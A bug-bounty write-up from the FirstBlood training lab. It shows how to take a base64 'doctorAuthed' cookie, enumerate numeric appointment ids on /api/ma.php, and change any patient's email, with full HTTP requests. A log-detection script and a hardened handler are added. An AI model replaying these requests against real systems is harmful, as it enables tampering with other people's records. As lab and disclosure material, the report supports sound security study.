FirstBlood-#228 Docauth cookie used to amend email - Additionally chained with Rpt 127 and 129 - This is the full report.
This issue was discovered on FirstBlood v1

On 2021-05-13, jpdev Level 3 reported:

Summary

When a specific base64-encoded cookie is supplied while amending an appointment, and the e-mail parameter is added to the request body with a new value, the submission succeeds. This results in the original e-mail address being replaced with the new value.

Additionally

This can be chained with bug report IDs 127 and 129.

Replication steps

Retrieve cookie

Navigate to the registration page: http://firstbloodhackers.com:49650/register.php

Enter any username and invite code; they do not need to be valid.

The server returns the following response and sets the cookie in the browser's cookie jar:

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 13 May 2021 17:56:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; expires=Thu, 13-May-2021 18:56:48 GMT; Max-Age=3600; path=/
Content-Length: 11014

The key part of this response is the cookie.

doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9

The appointment

  1. Create an appointment, save the request in Burp Repeater and make a note of the GUID. Label the request New.
  2. Once you have the GUID, navigate the UI and manage your appointment. Capture the request in Burp while searching for your appointment using the GUID. Send this to Repeater and label it Search.
  3. Amend the appointment and save the request. Label this Amend.
  4. Now cancel your appointment and save the request in Repeater. Label this Cancel.

Hunting valid appointment ids

This is a cleaner version of report ID 129.

In the request from step 2 of the appointment stage, you should see the aptid parameter:

GET /manageappointment.php?success&aptid=bbc826ec-a9a3-4697-b8fa-4a623033e21f

The aptid value can be used in place of the id parameter in a POST request to the /api/ma.php endpoint, which is used when editing the comments on, or cancelling, a valid appointment. This is the request labelled Cancel in Repeater from step 4 of the appointment stage.

Sending the request below with the aptid param in place of id, and iterating a numerical value in that param, returns a success response for any valid appointment id. For this request the act param needs to be set to cancel; note, however, that it does not actually cancel the appointment.

Request
POST /api/ma.php HTTP/1.1
Host: firstbloodhackers.com:49335
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-SITE-REQ: permitted
csrf: 99215d4e-0ff3-4275
Content-Length: 25
Origin: http://firstbloodhackers.com:49335
DNT: 1
Connection: close
Referer: http://firstbloodhackers.com:49335/manageappointment.php?success&aptid=81435813-e40a-411d-af19-6e2d89963493
Cookie: drps=62f02a3467fff377e02116e10

act=cancel&aptid=56911904

Response
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 13 May 2021 18:05:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 7

success
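
As an added detection example (not part of the original report), the following script scans constructed application-log lines for the traffic pattern described above: numeric appointment ids on /api/ma.php, one client cycling through many of them, and the two signals from later in the report (an email field in an amend request, and the client-side doctorAuthed cookie). The log format and the assumption that the application logs POST bodies are mine, not the target's.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Constructed log lines (not from the page): client, path, cookie names, body, status.
LOG_LINES = [
    '10.0.0.5 POST /api/ma.php cookies=drps body="act=cancel&aptid=56911904" 200',
    '10.0.0.5 POST /api/ma.php cookies=drps body="act=cancel&aptid=56911905" 200',
    '10.0.0.5 POST /api/ma.php cookies=drps body="act=cancel&aptid=56911906" 200',
    '10.0.0.9 POST /api/ma.php cookies=doctorAuthed body="message=changed1&email=x@example.com&id=56911356" 200',
    '10.0.0.7 POST /api/ma.php cookies=drps body="message=hello&id=bbc826ec-a9a3-4697-b8fa-4a623033e21f" 200',
]
LINE_RE = re.compile(r'^(\S+) POST (/api/ma\.php) cookies=(\S*) body="([^"]*)" (\d{3})$')


def analyse(lines, enum_threshold=3):
    """Return a list of (client, reason) findings for /api/ma.php traffic.

    Flags numeric appointment ids (the API should only ever see GUIDs), the
    non-amendable email field, the doctorAuthed cookie being presented to the
    API, and any client that touches enum_threshold or more distinct numeric ids.
    """
    findings = []
    ids_seen = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not an ma.php POST in the assumed format
        client, _path, cookies, body, _status = m.groups()
        params = {k: v[0] for k, v in parse_qs(body).items()}
        apt_id = params.get("id") or params.get("aptid")
        if apt_id and apt_id.isdigit():
            findings.append((client, "numeric appointment id"))
            ids_seen[client].add(apt_id)
        if "email" in params:
            findings.append((client, "email field in amend request"))
        if "doctorAuthed" in cookies.split(";"):
            findings.append((client, "doctorAuthed cookie on ma.php"))
    for client, ids in ids_seen.items():
        if len(ids) >= enum_threshold:
            findings.append((client, "id enumeration: %d distinct ids" % len(ids)))
    return findings


if __name__ == "__main__":
    for client, reason in analyse(LOG_LINES):
        print(client, reason)
```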

Changing the e-mail with the numerical id

In the request from step 1 of the appointment stage (the submission of a new appointment) you will see a number of parameters. These are, in no particular order:

fname, lname, address, city, phonenumber, dob, email, a1, a2, a3, slot

The one parameter we are interested in here is email.

Now that you have your cookie, a list of valid ids and the email param, you can use these in a copy of the request labelled Amend in Repeater (step 3 of the appointment stage).

Replace the message (report 127), add the email param with a value, and replace the GUID with one of the found numerical ids. Make sure your cookie is in place. Once the request is crafted and submitted you will get a success message: the e-mail has been changed on the appointment.

Request to amend the e-mail with a numerical id:

POST /api/ma.php HTTP/1.1
Host: firstbloodhackers.com:49650
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-SITE-REQ: permitted
csrf: 99215d4e-0ff3-4275
Content-Length: 51
Origin: http://firstbloodhackers.com:49650
Connection: close
Referer: http://firstbloodhackers.com:49650/manageappointment.php?success&aptid=bbc826ec-a9a3-4697-b8fa-4a623033e21f
Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9

message=changed1&[email protected]&id=56911356

Additional attack vector

Finally, the same can be achieved with the original GUID, although GUIDs are much more difficult to iterate!

Request
POST /api/ma.php HTTP/1.1
Host: firstbloodhackers.com:49650
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-SITE-REQ: permitted
csrf: 99215d4e-0ff3-4275
Content-Length: 205
Origin: http://firstbloodhackers.com:49650
Connection: close
Referer: http://firstbloodhackers.com:49650/manageappointment.php?success&aptid=bbc826ec-a9a3-4697-b8fa-4a623033e21f
Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9

message=changed1&[email protected]&id=bbc826ec-a9a3-4697-b8fa-4a623033e21f

Impact

This breaks the CIA triad: integrity of the data is not assured, as we have changed it. An attacker can do this en masse, changing the e-mail address of each appointment that is found to be valid.

P2 High

This report contains multiple vulnerabilities:

  • Insecure direct object reference
  • Application/Business Logic
FirstBlood ID: 6
Vulnerability Type: Insecure direct object reference

The endpoint MA.php (to modify an appointment) will allow for integer values to be used when modifying appointments. A bad case of security through obscurity was attempted.

FirstBlood ID: 7
Vulnerability Type: Application/Business Logic

The endpoint MA.php (to modify an appointment) only allows for certain values to be modified, however due to some application logic error, if the user has tried to signup as a doctor and has the cookie "doctorAuthed" set, then it allows them to modify the email address for any appointment.
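
To show the checks that close both findings (IDs 6 and 7), here is an added hardened model of the amend handler in Python; it is not FirstBlood's code. The in-memory store, the session token taken from the drps cookie in the report, and the allow-list of one amendable field (message) are assumptions. It also decodes the doctorAuthed cookie to show why a client-held value must never act as authorization.

```python
import base64
import re

DOCTOR_COOKIE = "eyJkb2N0b3JBdXRoIjphdXRoZWR9"  # value from the report
AMENDABLE_FIELDS = {"message"}                   # assumed: the only patient-editable field
GUID_RE = re.compile(r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$")

# Constructed store: GUID -> appointment, owned by the patient's drps session token.
APPOINTMENTS = {
    "bbc826ec-a9a3-4697-b8fa-4a623033e21f": {
        "owner": "62f02a3467fff377e02116e10",
        "email": "patient@example.com",
        "message": "original",
    },
}


def decode_doctor_cookie(value):
    """The cookie is plain base64 of a constant string handed to anyone who
    submits register.php, so it carries no proof of identity at all."""
    return base64.b64decode(value + "=" * (-len(value) % 4)).decode()


def amend_appointment(session_token, apt_id, fields, doctor_cookie=None):
    """Hardened handler: returns 'success' or an error string.
    doctor_cookie is accepted only to make the point that it is ignored;
    doctor privileges must come from server-side session state."""
    # 1. No integer fallback: anything that is not a GUID is rejected outright.
    if not GUID_RE.match(apt_id):
        return "invalid id"
    # 2. Ownership: the appointment must belong to the calling session.
    apt = APPOINTMENTS.get(apt_id)
    if apt is None or apt["owner"] != session_token:
        return "not found"  # same answer for missing and foreign ids
    # 3. Field allow-list: email is never amendable through this endpoint.
    unexpected = set(fields) - AMENDABLE_FIELDS
    if unexpected:
        return "field not allowed: " + ",".join(sorted(unexpected))
    apt.update(fields)
    return "success"
```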